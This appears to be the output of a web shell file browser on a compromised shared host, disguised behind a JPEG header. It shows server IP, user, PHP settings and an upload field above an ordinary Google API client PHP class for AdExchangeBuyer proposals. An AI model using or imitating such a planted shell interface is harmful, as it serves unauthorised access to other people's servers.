����JFIF��x�x����'
Server IP : 78.140.185.180 / Your IP : 3.19.76.4 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/builderbox/www/vendor/google/apiclient-services/src/AdExchangeBuyer/ |
Upload File : |
<?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Service\AdExchangeBuyer; class Proposal extends \Google\Collection { protected $collection_key = 'sellerContacts'; protected $billedBuyerType = Buyer::class; protected $billedBuyerDataType = ''; protected $buyerType = Buyer::class; protected $buyerDataType = ''; protected $buyerContactsType = ContactInformation::class; protected $buyerContactsDataType = 'array'; protected $buyerPrivateDataType = PrivateData::class; protected $buyerPrivateDataDataType = ''; public $dbmAdvertiserIds; public $hasBuyerSignedOff; public $hasSellerSignedOff; public $inventorySource; public $isRenegotiating; public $isSetupComplete; public $kind; protected $labelsType = MarketplaceLabel::class; protected $labelsDataType = 'array'; public $lastUpdaterOrCommentorRole; public $name; public $negotiationId; public $originatorRole; public $privateAuctionId; public $proposalId; public $proposalState; public $revisionNumber; public $revisionTimeMs; protected $sellerType = Seller::class; protected $sellerDataType = ''; protected $sellerContactsType = ContactInformation::class; protected $sellerContactsDataType = 'array'; /** * @param Buyer */ public function setBilledBuyer(Buyer $billedBuyer) { $this->billedBuyer = $billedBuyer; } /** * @return Buyer */ public function getBilledBuyer() { return $this->billedBuyer; } /** * @param Buyer */ public function setBuyer(Buyer $buyer) { $this->buyer = $buyer; } /** * @return Buyer */ public function getBuyer() { return $this->buyer; } /** * @param ContactInformation[] */ public function setBuyerContacts($buyerContacts) { $this->buyerContacts = $buyerContacts; } /** * @return ContactInformation[] */ public function getBuyerContacts() { return $this->buyerContacts; } /** * @param PrivateData */ public function setBuyerPrivateData(PrivateData $buyerPrivateData) { $this->buyerPrivateData = $buyerPrivateData; } /** * @return PrivateData */ public function getBuyerPrivateData() { return $this->buyerPrivateData; } public function setDbmAdvertiserIds($dbmAdvertiserIds) { $this->dbmAdvertiserIds = $dbmAdvertiserIds; } public function getDbmAdvertiserIds() { return $this->dbmAdvertiserIds; } public function setHasBuyerSignedOff($hasBuyerSignedOff) { $this->hasBuyerSignedOff = $hasBuyerSignedOff; } public function getHasBuyerSignedOff() { return $this->hasBuyerSignedOff; } public function setHasSellerSignedOff($hasSellerSignedOff) { $this->hasSellerSignedOff = $hasSellerSignedOff; } public function getHasSellerSignedOff() { return $this->hasSellerSignedOff; } public function setInventorySource($inventorySource) { $this->inventorySource = $inventorySource; } public function getInventorySource() { return $this->inventorySource; } public function setIsRenegotiating($isRenegotiating) { $this->isRenegotiating = $isRenegotiating; } public function getIsRenegotiating() { return $this->isRenegotiating; } public function setIsSetupComplete($isSetupComplete) { $this->isSetupComplete = $isSetupComplete; } public function getIsSetupComplete() { return $this->isSetupComplete; } public function setKind($kind) { $this->kind = $kind; } public function getKind() { return $this->kind; } /** * @param MarketplaceLabel[] */ public function setLabels($labels) { $this->labels = $labels; } /** * @return MarketplaceLabel[] */ public function getLabels() { return $this->labels; } public function setLastUpdaterOrCommentorRole($lastUpdaterOrCommentorRole) { $this->lastUpdaterOrCommentorRole = $lastUpdaterOrCommentorRole; } public function getLastUpdaterOrCommentorRole() { return $this->lastUpdaterOrCommentorRole; } public function setName($name) { $this->name = $name; } public function getName() { return $this->name; } public function setNegotiationId($negotiationId) { $this->negotiationId = $negotiationId; } public function getNegotiationId() { return $this->negotiationId; } public function setOriginatorRole($originatorRole) { $this->originatorRole = $originatorRole; } public function getOriginatorRole() { return $this->originatorRole; } public function setPrivateAuctionId($privateAuctionId) { $this->privateAuctionId = $privateAuctionId; } public function getPrivateAuctionId() { return $this->privateAuctionId; } public function setProposalId($proposalId) { $this->proposalId = $proposalId; } public function getProposalId() { return $this->proposalId; } public function setProposalState($proposalState) { $this->proposalState = $proposalState; } public function getProposalState() { return $this->proposalState; } public function setRevisionNumber($revisionNumber) { $this->revisionNumber = $revisionNumber; } public function getRevisionNumber() { return $this->revisionNumber; } public function setRevisionTimeMs($revisionTimeMs) { $this->revisionTimeMs = $revisionTimeMs; } public function getRevisionTimeMs() { return $this->revisionTimeMs; } /** * @param Seller */ public function setSeller(Seller $seller) { $this->seller = $seller; } /** * @return Seller */ public function getSeller() { return $this->seller; } /** * @param ContactInformation[] */ public function setSellerContacts($sellerContacts) { $this->sellerContacts = $sellerContacts; } /** * @return ContactInformation[] */ public function getSellerContacts() { return $this->sellerContacts; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Proposal::class, 'Google_Service_AdExchangeBuyer_Proposal');